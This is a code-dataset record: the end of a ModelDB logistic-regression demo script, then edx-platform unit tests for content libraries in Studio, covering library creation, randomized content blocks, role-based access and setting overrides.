model_path = os.path.join("..", "output", "client-demo", f"logreg_gridsearch_{hyperparam_num}.gz")
joblib.dump(model, model_path)
run.log_model(model_path)
# close client
client.disconnect()
# fetch existing project, experiment, and experiment runs
client = ModelDBClient()
proj = client.set_project("Test Project")
expt = client.set_experiment("Test Experiment")
client.set_experiment_runs()
# fetch best experiment run based on validation accuracy
best_run = sorted(client.expt_runs, key=lambda expt_run: expt_run.get_metrics()['validation accuracy'])[-1]
# fetch that run's hyperparameters and validation accuracy
best_hyperparams = best_run.get_hyperparameters()
best_val_acc = best_run.get_metrics()['validation accuracy']
print("Best Validation Round:")
print(f"{best_hyperparams} Validation accuracy: {best_val_acc}")
# retrain model using best set of hyperparameters
model = linear_model.LogisticRegression(**best_hyperparams)
model.fit(np.concatenate((X_train, X_val), axis=0), np.concatenate((y_train, y_val)))
print(f"Training accuracy: {model.score(X_train, y_train)}")
print(f"Testing accuracy: {model.score(X_test, y_test)}")
# close client
client.disconnect()
| mit | 3,824,065,516,834,919,000 | 28.880342 | 114 | 0.716819 | false |
stvstnfrd/edx-platform | cms/djangoapps/contentstore/tests/test_libraries.py | 1 | 45058 | """
Content library unit tests that require the CMS runtime.
"""
import ddt
import six
from django.test.utils import override_settings
from mock import Mock, patch
from opaque_keys.edx.locator import CourseKey, LibraryLocator
from six.moves import range
from cms.djangoapps.contentstore.tests.utils import AjaxEnabledTestClient, parse_json
from cms.djangoapps.contentstore.utils import reverse_library_url, reverse_url, reverse_usage_url
from cms.djangoapps.contentstore.views.item import _duplicate_item
from cms.djangoapps.contentstore.views.preview import _load_preview_module
from cms.djangoapps.contentstore.views.tests.test_library import LIBRARY_REST_URL
from cms.djangoapps.course_creators.views import add_user_with_status_granted
from common.djangoapps.student import auth
from common.djangoapps.student.auth import has_studio_read_access, has_studio_write_access
from common.djangoapps.student.roles import (
CourseInstructorRole,
CourseStaffRole,
LibraryUserRole,
OrgInstructorRole,
OrgLibraryUserRole,
OrgStaffRole
)
from common.djangoapps.student.tests.factories import UserFactory
from common.djangoapps.xblock_django.user_service import DjangoXBlockUserService
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from xmodule.x_module import STUDIO_VIEW
class LibraryTestCase(ModuleStoreTestCase):
"""
Common functionality for content libraries tests
"""
def setUp(self):
super(LibraryTestCase, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.user = UserFactory(password=self.user_password, is_staff=True)
self.client = AjaxEnabledTestClient()
self._login_as_staff_user(logout_first=False)
self.lib_key = self._create_library()
self.library = modulestore().get_library(self.lib_key)
self.session_data = {} # Used by _bind_module
def _login_as_staff_user(self, logout_first=True):
""" Login as a staff user """
if logout_first:
self.client.logout()
self.client.login(username=self.user.username, password=self.user_password)
def _create_library(self, org="org", library="lib", display_name="Test Library"):
"""
Helper method used to create a library. Uses the REST API.
"""
response = self.client.ajax_post(LIBRARY_REST_URL, {
'org': org,
'library': library,
'display_name': display_name,
})
self.assertEqual(response.status_code, 200)
lib_info = parse_json(response)
lib_key = CourseKey.from_string(lib_info['library_key'])
self.assertIsInstance(lib_key, LibraryLocator)
return lib_key
def _add_library_content_block(self, course, library_key, publish_item=False, other_settings=None):
"""
Helper method to add a LibraryContent block to a course.
The block will be configured to select content from the library
specified by library_key.
other_settings can be a dict of Scope.settings fields to set on the block.
"""
return ItemFactory.create(
category='library_content',
parent_location=course.location,
user_id=self.user.id,
publish_item=publish_item,
source_library_id=six.text_type(library_key),
**(other_settings or {})
)
def _add_simple_content_block(self):
""" Adds simple HTML block to library """
return ItemFactory.create(
category="html", parent_location=self.library.location,
user_id=self.user.id, publish_item=False
)
def _refresh_children(self, lib_content_block, status_code_expected=200):
"""
Helper method: Uses the REST API to call the 'refresh_children' handler
of a LibraryContent block
"""
if 'user' not in lib_content_block.runtime._services: # pylint: disable=protected-access
user_service = DjangoXBlockUserService(self.user)
lib_content_block.runtime._services['user'] = user_service # pylint: disable=protected-access
handler_url = reverse_usage_url(
'component_handler',
lib_content_block.location,
kwargs={'handler': 'refresh_children'}
)
response = self.client.ajax_post(handler_url)
self.assertEqual(response.status_code, status_code_expected)
return modulestore().get_item(lib_content_block.location)
def _bind_module(self, descriptor, user=None):
"""
Helper to use the CMS's module system so we can access student-specific fields.
"""
if user is None:
user = self.user
if user not in self.session_data:
self.session_data[user] = {}
request = Mock(user=user, session=self.session_data[user])
_load_preview_module(request, descriptor)
def _update_item(self, usage_key, metadata):
"""
Helper method: Uses the REST API to update the fields of an XBlock.
This will result in the XBlock's editor_saved() method being called.
"""
update_url = reverse_usage_url("xblock_handler", usage_key)
return self.client.ajax_post(
update_url,
data={
'metadata': metadata,
}
)
def _list_libraries(self):
"""
Use the REST API to get a list of libraries visible to the current user.
"""
response = self.client.get_json(LIBRARY_REST_URL)
self.assertEqual(response.status_code, 200)
return parse_json(response)
@ddt.ddt
class TestLibraries(LibraryTestCase):
"""
High-level tests for libraries
"""
@ddt.data(
(2, 1, 1),
(2, 2, 2),
(2, 20, 2),
)
@ddt.unpack
def test_max_items(self, num_to_create, num_to_select, num_expected):
"""
Test the 'max_count' property of LibraryContent blocks.
"""
for _ in range(num_to_create):
self._add_simple_content_block()
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
lc_block = self._add_library_content_block(course, self.lib_key, other_settings={'max_count': num_to_select})
self.assertEqual(len(lc_block.children), 0)
lc_block = self._refresh_children(lc_block)
# Now, we want to make sure that .children has the total # of potential
# children, and that get_child_descriptors() returns the actual children
# chosen for a given student.
# In order to be able to call get_child_descriptors(), we must first
# call bind_for_student:
self._bind_module(lc_block)
self.assertEqual(len(lc_block.children), num_to_create)
self.assertEqual(len(lc_block.get_child_descriptors()), num_expected)
def test_consistent_children(self):
"""
Test that the same student will always see the same selected child block
"""
# Create many blocks in the library and add them to a course:
for num in range(8):
ItemFactory.create(
data=u"This is #{}".format(num + 1),
category="html", parent_location=self.library.location, user_id=self.user.id, publish_item=False
)
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
lc_block = self._add_library_content_block(course, self.lib_key, {'max_count': 1})
lc_block_key = lc_block.location
lc_block = self._refresh_children(lc_block)
def get_child_of_lc_block(block):
"""
Fetch the child shown to the current user.
"""
children = block.get_child_descriptors()
self.assertEqual(len(children), 1)
return children[0]
# Check which child a student will see:
self._bind_module(lc_block)
chosen_child = get_child_of_lc_block(lc_block)
chosen_child_defn_id = chosen_child.definition_locator.definition_id
lc_block.save()
modulestore().update_item(lc_block, self.user.id)
# Now re-load the block and try again:
def check():
"""
Confirm that chosen_child is still the child seen by the test student
"""
for _ in range(6): # Repeat many times b/c blocks are randomized
lc_block = modulestore().get_item(lc_block_key) # Reload block from the database
self._bind_module(lc_block)
current_child = get_child_of_lc_block(lc_block)
self.assertEqual(current_child.location, chosen_child.location)
self.assertEqual(current_child.data, chosen_child.data)
self.assertEqual(current_child.definition_locator.definition_id, chosen_child_defn_id)
check()
# Refresh the children:
lc_block = self._refresh_children(lc_block)
# Now re-load the block and try yet again, in case refreshing the children changed anything:
check()
def test_definition_shared_with_library(self):
"""
Test that the same block definition is used for the library and course[s]
"""
block1 = self._add_simple_content_block()
def_id1 = block1.definition_locator.definition_id
block2 = self._add_simple_content_block()
def_id2 = block2.definition_locator.definition_id
self.assertNotEqual(def_id1, def_id2)
# Next, create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
for child_key in lc_block.children:
child = modulestore().get_item(child_key)
def_id = child.definition_locator.definition_id
self.assertIn(def_id, (def_id1, def_id2))
def test_fields(self):
"""
Test that blocks used from a library have the same field values as
defined by the library author.
"""
data_value = "A Scope.content value"
name_value = "A Scope.settings value"
lib_block = ItemFactory.create(
category="html",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
display_name=name_value,
data=data_value,
)
self.assertEqual(lib_block.data, data_value)
self.assertEqual(lib_block.display_name, name_value)
# Next, create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
course_block = modulestore().get_item(lc_block.children[0])
self.assertEqual(course_block.data, data_value)
self.assertEqual(course_block.display_name, name_value)
def test_block_with_children(self):
"""
Test that blocks used from a library can have children.
"""
data_value = "A Scope.content value"
name_value = "A Scope.settings value"
# In the library, create a vertical block with a child:
vert_block = ItemFactory.create(
category="vertical",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
)
child_block = ItemFactory.create(
category="html",
parent_location=vert_block.location,
user_id=self.user.id,
publish_item=False,
display_name=name_value,
data=data_value,
)
self.assertEqual(child_block.data, data_value)
self.assertEqual(child_block.display_name, name_value)
# Next, create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
self.assertEqual(len(lc_block.children), 1)
course_vert_block = modulestore().get_item(lc_block.children[0])
self.assertEqual(len(course_vert_block.children), 1)
course_child_block = modulestore().get_item(course_vert_block.children[0])
self.assertEqual(course_child_block.data, data_value)
self.assertEqual(course_child_block.display_name, name_value)
def test_change_after_first_sync(self):
"""
Check that nothing goes wrong if we (A) Set up a LibraryContent block
and use it successfully, then (B) Give it an invalid configuration.
No children should be deleted until the configuration is fixed.
"""
# Add a block to the library:
data_value = "Hello world!"
ItemFactory.create(
category="html",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
display_name="HTML BLock",
data=data_value,
)
# Create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
self.assertEqual(len(lc_block.children), 1)
# Now, change the block settings to have an invalid library key:
resp = self._update_item(
lc_block.location,
{"source_library_id": "library-v1:NOT+FOUND"},
)
self.assertEqual(resp.status_code, 200)
lc_block = modulestore().get_item(lc_block.location)
self.assertEqual(len(lc_block.children), 1) # Children should not be deleted due to a bad setting.
html_block = modulestore().get_item(lc_block.children[0])
self.assertEqual(html_block.data, data_value)
def test_refreshes_children_if_libraries_change(self):
""" Tests that children are automatically refreshed if libraries list changes """
library2key = self._create_library("org2", "lib2", "Library2")
library2 = modulestore().get_library(library2key)
data1, data2 = "Hello world!", "Hello other world!"
ItemFactory.create(
category="html",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
display_name="Lib1: HTML BLock",
data=data1,
)
ItemFactory.create(
category="html",
parent_location=library2.location,
user_id=self.user.id,
publish_item=False,
display_name="Lib 2: HTML BLock",
data=data2,
)
# Create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
self.assertEqual(len(lc_block.children), 1)
# Now, change the block settings to have an invalid library key:
resp = self._update_item(
lc_block.location,
{"source_library_id": str(library2key)},
)
self.assertEqual(resp.status_code, 200)
lc_block = modulestore().get_item(lc_block.location)
self.assertEqual(len(lc_block.children), 1)
html_block = modulestore().get_item(lc_block.children[0])
self.assertEqual(html_block.data, data2)
@patch("xmodule.library_tools.SearchEngine.get_search_engine", Mock(return_value=None, autospec=True))
def test_refreshes_children_if_capa_type_change(self):
""" Tests that children are automatically refreshed if capa type field changes """
name1, name2 = "Option Problem", "Multiple Choice Problem"
ItemFactory.create(
category="problem",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
display_name=name1,
data="<problem><optionresponse></optionresponse></problem>",
)
ItemFactory.create(
category="problem",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
display_name=name2,
data="<problem><multiplechoiceresponse></multiplechoiceresponse></problem>",
)
# Create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
self.assertEqual(len(lc_block.children), 2)
resp = self._update_item(
lc_block.location,
{"capa_type": 'optionresponse'},
)
self.assertEqual(resp.status_code, 200)
lc_block = modulestore().get_item(lc_block.location)
self.assertEqual(len(lc_block.children), 1)
html_block = modulestore().get_item(lc_block.children[0])
self.assertEqual(html_block.display_name, name1)
resp = self._update_item(
lc_block.location,
{"capa_type": 'multiplechoiceresponse'},
)
self.assertEqual(resp.status_code, 200)
lc_block = modulestore().get_item(lc_block.location)
self.assertEqual(len(lc_block.children), 1)
html_block = modulestore().get_item(lc_block.children[0])
self.assertEqual(html_block.display_name, name2)
def test_refresh_fails_for_unknown_library(self):
""" Tests that refresh children fails if unknown library is configured """
# Create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
self.assertEqual(len(lc_block.children), 0)
# Now, change the block settings to have an invalid library key:
resp = self._update_item(
lc_block.location,
{"source_library_id": "library-v1:NOT+FOUND"},
)
self.assertEqual(resp.status_code, 200)
with self.assertRaises(ValueError):
self._refresh_children(lc_block, status_code_expected=400)
def test_library_filters(self):
"""
Test the filters in the list libraries API
"""
self._create_library(library="test-lib1", display_name="Foo", org='org')
self._create_library(library="test-lib2", display_name="Library-Title-2", org='org-test1')
self._create_library(library="l3", display_name="Library-Title-3", org='org-test1')
self._create_library(library="l4", display_name="Library-Title-4", org='org-test2')
self.assertEqual(len(self.client.get_json(LIBRARY_REST_URL).json()), 5) # 1 more from self.setUp()
self.assertEqual(len(self.client.get_json('{}?org=org-test1'.format(LIBRARY_REST_URL)).json()), 2)
self.assertEqual(len(self.client.get_json('{}?text_search=test-lib'.format(LIBRARY_REST_URL)).json()), 2)
self.assertEqual(len(self.client.get_json('{}?text_search=library-title'.format(LIBRARY_REST_URL)).json()), 3)
self.assertEqual(len(self.client.get_json('{}?text_search=library-'.format(LIBRARY_REST_URL)).json()), 3)
self.assertEqual(len(self.client.get_json('{}?text_search=org-test'.format(LIBRARY_REST_URL)).json()), 3)
@ddt.ddt
@patch('django.conf.settings.SEARCH_ENGINE', None)
class TestLibraryAccess(LibraryTestCase):
"""
Test Roles and Permissions related to Content Libraries
"""
def setUp(self):
""" Create a library, staff user, and non-staff user """
super(TestLibraryAccess, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.non_staff_user_password = 'foo'
self.non_staff_user = UserFactory(password=self.non_staff_user_password, is_staff=False)
def _login_as_non_staff_user(self, logout_first=True):
""" Login as a user that starts out with no roles/permissions granted. """
if logout_first:
self.client.logout() # We start logged in as a staff user
self.client.login(username=self.non_staff_user.username, password=self.non_staff_user_password)
def _assert_cannot_create_library(self, org="org", library="libfail", expected_code=403):
""" Ensure the current user is not able to create a library. """
self.assertGreaterEqual(expected_code, 300)
response = self.client.ajax_post(
LIBRARY_REST_URL,
{'org': org, 'library': library, 'display_name': "Irrelevant"}
)
self.assertEqual(response.status_code, expected_code)
key = LibraryLocator(org=org, library=library)
self.assertEqual(modulestore().get_library(key), None)
def _can_access_library(self, library):
"""
Use the normal studio library URL to check if we have access
`library` can be a LibraryLocator or the library's root XBlock
"""
if isinstance(library, (six.string_types, LibraryLocator)):
lib_key = library
else:
lib_key = library.location.library_key
response = self.client.get(reverse_library_url('library_handler', six.text_type(lib_key)))
self.assertIn(response.status_code, (200, 302, 403))
return response.status_code == 200
def tearDown(self):
"""
Log out when done each test
"""
self.client.logout()
super(TestLibraryAccess, self).tearDown() # lint-amnesty, pylint: disable=super-with-arguments
def test_creation(self):
"""
The user that creates a library should have instructor (admin) and staff permissions
"""
# self.library has been auto-created by the staff user.
self.assertTrue(has_studio_write_access(self.user, self.lib_key))
self.assertTrue(has_studio_read_access(self.user, self.lib_key))
# Make sure the user was actually assigned the instructor role and not just using is_staff superpowers:
self.assertTrue(CourseInstructorRole(self.lib_key).has_user(self.user))
# Now log out and ensure we are forbidden from creating a library:
self.client.logout()
self._assert_cannot_create_library(expected_code=302) # 302 redirect to login expected
# Now check that logged-in users without CourseCreator role cannot create libraries
self._login_as_non_staff_user(logout_first=False)
with patch.dict('django.conf.settings.FEATURES', {'ENABLE_CREATOR_GROUP': True}):
self._assert_cannot_create_library(expected_code=403) # 403 user is not CourseCreator
# Now check that logged-in users with CourseCreator role can create libraries
add_user_with_status_granted(self.user, self.non_staff_user)
with patch.dict('django.conf.settings.FEATURES', {'ENABLE_CREATOR_GROUP': True}):
lib_key2 = self._create_library(library="lib2", display_name="Test Library 2")
library2 = modulestore().get_library(lib_key2)
self.assertIsNotNone(library2)
@ddt.data(
CourseInstructorRole,
CourseStaffRole,
LibraryUserRole,
)
    def test_access(self, access_role):
"""
Test the various roles that allow viewing libraries are working correctly.
"""
# At this point, one library exists, created by the currently-logged-in staff user.
# Create another library as staff:
library2_key = self._create_library(library="lib2")
# Login as non_staff_user:
self._login_as_non_staff_user()
# non_staff_user shouldn't be able to access any libraries:
lib_list = self._list_libraries()
self.assertEqual(len(lib_list), 0)
self.assertFalse(self._can_access_library(self.library))
self.assertFalse(self._can_access_library(library2_key))
# Now manually intervene to give non_staff_user access to library2_key:
access_role(library2_key).add_users(self.non_staff_user)
# Now non_staff_user should be able to access library2_key only:
lib_list = self._list_libraries()
self.assertEqual(len(lib_list), 1)
self.assertEqual(lib_list[0]["library_key"], six.text_type(library2_key))
self.assertTrue(self._can_access_library(library2_key))
self.assertFalse(self._can_access_library(self.library))
@ddt.data(
OrgStaffRole,
OrgInstructorRole,
OrgLibraryUserRole,
)
def test_org_based_access(self, org_access_role):
"""
Test the various roles that allow viewing all of an organization's
libraries are working correctly.
"""
# Create some libraries as the staff user:
lib_key_pacific = self._create_library(org="PacificX", library="libP")
lib_key_atlantic = self._create_library(org="AtlanticX", library="libA")
# Login as a non-staff:
self._login_as_non_staff_user()
# Now manually intervene to give non_staff_user access to all "PacificX" libraries:
org_access_role(lib_key_pacific.org).add_users(self.non_staff_user)
# Now non_staff_user should be able to access lib_key_pacific only:
lib_list = self._list_libraries()
self.assertEqual(len(lib_list), 1)
self.assertEqual(lib_list[0]["library_key"], six.text_type(lib_key_pacific))
self.assertTrue(self._can_access_library(lib_key_pacific))
self.assertFalse(self._can_access_library(lib_key_atlantic))
self.assertFalse(self._can_access_library(self.lib_key))
@ddt.data(True, False)
def test_read_only_role(self, use_org_level_role):
"""
Test the read-only role (LibraryUserRole and its org-level equivalent)
"""
# As staff user, add a block to self.library:
block = self._add_simple_content_block()
# Login as a non_staff_user:
self._login_as_non_staff_user()
self.assertFalse(self._can_access_library(self.library))
block_url = reverse_usage_url('xblock_handler', block.location)
def can_read_block():
""" Check if studio lets us view the XBlock in the library """
response = self.client.get_json(block_url)
self.assertIn(response.status_code, (200, 403)) # 400 would be ambiguous
return response.status_code == 200
def can_edit_block():
""" Check if studio lets us edit the XBlock in the library """
response = self.client.ajax_post(block_url)
self.assertIn(response.status_code, (200, 403)) # 400 would be ambiguous
return response.status_code == 200
def can_delete_block():
""" Check if studio lets us delete the XBlock in the library """
response = self.client.delete(block_url)
self.assertIn(response.status_code, (200, 403)) # 400 would be ambiguous
return response.status_code == 200
def can_copy_block():
""" Check if studio lets us duplicate the XBlock in the library """
response = self.client.ajax_post(reverse_url('xblock_handler'), {
'parent_locator': six.text_type(self.library.location),
'duplicate_source_locator': six.text_type(block.location),
})
self.assertIn(response.status_code, (200, 403)) # 400 would be ambiguous
return response.status_code == 200
def can_create_block():
""" Check if studio lets us make a new XBlock in the library """
response = self.client.ajax_post(reverse_url('xblock_handler'), {
'parent_locator': six.text_type(self.library.location), 'category': 'html',
})
self.assertIn(response.status_code, (200, 403)) # 400 would be ambiguous
return response.status_code == 200
# Check that we do not have read or write access to block:
self.assertFalse(can_read_block())
self.assertFalse(can_edit_block())
self.assertFalse(can_delete_block())
self.assertFalse(can_copy_block())
self.assertFalse(can_create_block())
# Give non_staff_user read-only permission:
if use_org_level_role:
OrgLibraryUserRole(self.lib_key.org).add_users(self.non_staff_user)
else:
LibraryUserRole(self.lib_key).add_users(self.non_staff_user)
self.assertTrue(self._can_access_library(self.library))
self.assertTrue(can_read_block())
self.assertFalse(can_edit_block())
self.assertFalse(can_delete_block())
self.assertFalse(can_copy_block())
self.assertFalse(can_create_block())
@ddt.data(
(LibraryUserRole, CourseStaffRole, True),
(CourseStaffRole, CourseStaffRole, True),
(None, CourseStaffRole, False),
(LibraryUserRole, None, False),
)
@ddt.unpack
def test_duplicate_across_courses(self, library_role, course_role, expected_result):
"""
Test that the REST API will correctly allow/refuse when copying
from a library with (write, read, or no) access to a course with (write or no) access.
"""
# As staff user, add a block to self.library:
block = self._add_simple_content_block()
# And create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
self._login_as_non_staff_user()
# Assign roles:
if library_role:
library_role(self.lib_key).add_users(self.non_staff_user)
if course_role:
course_role(course.location.course_key).add_users(self.non_staff_user)
# Copy block to the course:
response = self.client.ajax_post(reverse_url('xblock_handler'), {
'parent_locator': six.text_type(course.location),
'duplicate_source_locator': six.text_type(block.location),
})
self.assertIn(response.status_code, (200, 403)) # 400 would be ambiguous
duplicate_action_allowed = (response.status_code == 200)
self.assertEqual(duplicate_action_allowed, expected_result)
@ddt.data(
(LibraryUserRole, CourseStaffRole, True),
(CourseStaffRole, CourseStaffRole, True),
(None, CourseStaffRole, False),
(LibraryUserRole, None, False),
)
@ddt.unpack
def test_refresh_library_content_permissions(self, library_role, course_role, expected_result):
"""
Test that the LibraryContent block's 'refresh_children' handler will correctly
handle permissions and allow/refuse when updating its content with the latest
version of a library. We try updating from a library with (write, read, or no)
access to a course with (write or no) access.
"""
# As staff user, add a block to self.library:
self._add_simple_content_block()
# And create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
self._login_as_non_staff_user()
# Assign roles:
if library_role:
library_role(self.lib_key).add_users(self.non_staff_user)
if course_role:
course_role(course.location.course_key).add_users(self.non_staff_user)
# Try updating our library content block:
lc_block = self._add_library_content_block(course, self.lib_key)
# We must use the CMS's module system in order to get permissions checks.
self._bind_module(lc_block, user=self.non_staff_user)
lc_block = self._refresh_children(lc_block, status_code_expected=200 if expected_result else 403)
self.assertEqual(len(lc_block.children), 1 if expected_result else 0)
def test_studio_user_permissions(self):
"""
        Test that a user can attach to a problem only those libraries they have access to (or which they created).
        This test was created on the basis of a bug described in the following pull requests on GitHub:
https://github.com/edx/edx-platform/pull/11331
https://github.com/edx/edx-platform/pull/11611
"""
self._create_library(org='admin_org_1', library='lib_adm_1', display_name='admin_lib_1')
self._create_library(org='admin_org_2', library='lib_adm_2', display_name='admin_lib_2')
self._login_as_non_staff_user()
self._create_library(org='staff_org_1', library='lib_staff_1', display_name='staff_lib_1')
self._create_library(org='staff_org_2', library='lib_staff_2', display_name='staff_lib_2')
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
instructor_role = CourseInstructorRole(course.id)
auth.add_users(self.user, instructor_role, self.non_staff_user)
lib_block = ItemFactory.create(
category='library_content',
parent_location=course.location,
user_id=self.non_staff_user.id,
publish_item=False
)
def _get_settings_html():
"""
Helper function to get block settings HTML
Used to check the available libraries.
"""
edit_view_url = reverse_usage_url("xblock_view_handler", lib_block.location, {"view_name": STUDIO_VIEW})
resp = self.client.get_json(edit_view_url)
self.assertEqual(resp.status_code, 200)
return parse_json(resp)['html']
self._login_as_staff_user()
staff_settings_html = _get_settings_html()
self.assertIn('staff_lib_1', staff_settings_html)
self.assertIn('staff_lib_2', staff_settings_html)
self.assertIn('admin_lib_1', staff_settings_html)
self.assertIn('admin_lib_2', staff_settings_html)
self._login_as_non_staff_user()
response = self.client.get_json(LIBRARY_REST_URL)
staff_libs = parse_json(response)
self.assertEqual(2, len(staff_libs))
non_staff_settings_html = _get_settings_html()
self.assertIn('staff_lib_1', non_staff_settings_html)
self.assertIn('staff_lib_2', non_staff_settings_html)
self.assertNotIn('admin_lib_1', non_staff_settings_html)
self.assertNotIn('admin_lib_2', non_staff_settings_html)
@ddt.ddt
@override_settings(SEARCH_ENGINE=None)
class TestOverrides(LibraryTestCase):
"""
Test that overriding block Scope.settings fields from a library in a specific course works
"""
def setUp(self):
super(TestOverrides, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.original_display_name = "A Problem Block"
self.original_weight = 1
# Create a problem block in the library:
self.problem = ItemFactory.create(
category="problem",
parent_location=self.library.location,
display_name=self.original_display_name, # display_name is a Scope.settings field
weight=self.original_weight, # weight is also a Scope.settings field
user_id=self.user.id,
publish_item=False,
)
# Refresh library now that we've added something.
self.library = modulestore().get_library(self.lib_key)
# Also create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
self.course = CourseFactory.create()
# Add a LibraryContent block to the course:
self.lc_block = self._add_library_content_block(self.course, self.lib_key)
self.lc_block = self._refresh_children(self.lc_block)
self.problem_in_course = modulestore().get_item(self.lc_block.children[0])
def test_overrides(self):
"""
Test that we can override Scope.settings values in a course.
"""
new_display_name = "Modified Problem Title"
new_weight = 10
self.problem_in_course.display_name = new_display_name
self.problem_in_course.weight = new_weight
modulestore().update_item(self.problem_in_course, self.user.id)
# Add a second LibraryContent block to the course, with no override:
lc_block2 = self._add_library_content_block(self.course, self.lib_key)
lc_block2 = self._refresh_children(lc_block2)
# Re-load the two problem blocks - one with and one without an override:
self.problem_in_course = modulestore().get_item(self.lc_block.children[0])
problem2_in_course = modulestore().get_item(lc_block2.children[0])
self.assertEqual(self.problem_in_course.display_name, new_display_name)
self.assertEqual(self.problem_in_course.weight, new_weight)
self.assertEqual(problem2_in_course.display_name, self.original_display_name)
self.assertEqual(problem2_in_course.weight, self.original_weight)
def test_reset_override(self):
"""
If we override a setting and then reset it, we should get the library value.
"""
new_display_name = "Modified Problem Title"
new_weight = 10
self.problem_in_course.display_name = new_display_name
self.problem_in_course.weight = new_weight
modulestore().update_item(self.problem_in_course, self.user.id)
self.problem_in_course = modulestore().get_item(self.problem_in_course.location)
self.assertEqual(self.problem_in_course.display_name, new_display_name)
self.assertEqual(self.problem_in_course.weight, new_weight)
# Reset:
for field_name in ["display_name", "weight"]:
self.problem_in_course.fields[field_name].delete_from(self.problem_in_course)
# Save, reload, and verify:
modulestore().update_item(self.problem_in_course, self.user.id)
self.problem_in_course = modulestore().get_item(self.problem_in_course.location)
self.assertEqual(self.problem_in_course.display_name, self.original_display_name)
self.assertEqual(self.problem_in_course.weight, self.original_weight)
def test_consistent_definitions(self):
"""
Make sure that the new child of the LibraryContent block
shares its definition with the original (self.problem).
This test is specific to split mongo.
"""
definition_id = self.problem.definition_locator.definition_id
self.assertEqual(self.problem_in_course.definition_locator.definition_id, definition_id)
# Now even if we change some Scope.settings fields and refresh, the definition should be unchanged
self.problem.weight = 20
self.problem.display_name = "NEW"
modulestore().update_item(self.problem, self.user.id)
self.lc_block = self._refresh_children(self.lc_block)
self.problem_in_course = modulestore().get_item(self.problem_in_course.location)
self.assertEqual(self.problem.definition_locator.definition_id, definition_id)
self.assertEqual(self.problem_in_course.definition_locator.definition_id, definition_id)
@ddt.data(False, True)
def test_persistent_overrides(self, duplicate):
"""
Test that when we override Scope.settings values in a course,
the override values persist even when the block is refreshed
with updated blocks from the library.
"""
new_display_name = "Modified Problem Title"
new_weight = 15
self.problem_in_course.display_name = new_display_name
self.problem_in_course.weight = new_weight
modulestore().update_item(self.problem_in_course, self.user.id)
if duplicate:
            # Check that this also works when the RCB (randomized content block) is duplicated.
self.lc_block = modulestore().get_item(
_duplicate_item(self.course.location, self.lc_block.location, self.user)
)
self.problem_in_course = modulestore().get_item(self.lc_block.children[0])
else:
self.problem_in_course = modulestore().get_item(self.problem_in_course.location)
self.assertEqual(self.problem_in_course.display_name, new_display_name)
self.assertEqual(self.problem_in_course.weight, new_weight)
# Change the settings in the library version:
self.problem.display_name = "X"
self.problem.weight = 99
        new_data_value = "<problem><p>Changed data to check that non-overridden fields *do* get updated.</p></problem>"
self.problem.data = new_data_value
modulestore().update_item(self.problem, self.user.id)
self.lc_block = self._refresh_children(self.lc_block)
self.problem_in_course = modulestore().get_item(self.problem_in_course.location)
self.assertEqual(self.problem_in_course.display_name, new_display_name)
self.assertEqual(self.problem_in_course.weight, new_weight)
self.assertEqual(self.problem_in_course.data, new_data_value)
def test_duplicated_version(self):
"""
Test that if a library is updated, and the content block is duplicated,
the new block will use the old library version and not the new one.
"""
store = modulestore()
self.assertEqual(len(self.library.children), 1)
self.assertEqual(len(self.lc_block.children), 1)
# Edit the only problem in the library:
self.problem.display_name = "--changed in library--"
store.update_item(self.problem, self.user.id)
# Create an additional problem block in the library:
ItemFactory.create(
category="problem",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
)
# Refresh our reference to the library
self.library = store.get_library(self.lib_key)
# Refresh our reference to the block
self.lc_block = store.get_item(self.lc_block.location)
self.problem_in_course = store.get_item(self.problem_in_course.location)
# The library has changed...
self.assertEqual(len(self.library.children), 2)
# But the block hasn't.
self.assertEqual(len(self.lc_block.children), 1)
self.assertEqual(self.problem_in_course.location, self.lc_block.children[0])
self.assertEqual(self.problem_in_course.display_name, self.original_display_name)
# Duplicate self.lc_block:
duplicate = store.get_item(
_duplicate_item(self.course.location, self.lc_block.location, self.user)
)
# The duplicate should have identical children to the original:
self.assertEqual(len(duplicate.children), 1)
